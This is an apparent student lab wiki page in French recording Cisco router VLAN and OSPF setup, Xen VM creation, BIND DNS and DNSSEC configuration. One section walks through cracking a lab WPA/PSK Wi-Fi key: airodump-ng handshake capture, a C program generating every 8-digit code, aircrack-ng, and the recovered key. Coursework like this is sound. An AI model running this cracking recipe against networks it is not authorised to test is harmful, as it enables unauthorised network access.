Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
Un bon moyen de contrôler le déploiement de nos clefs : [http://dnsviz.net/]&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
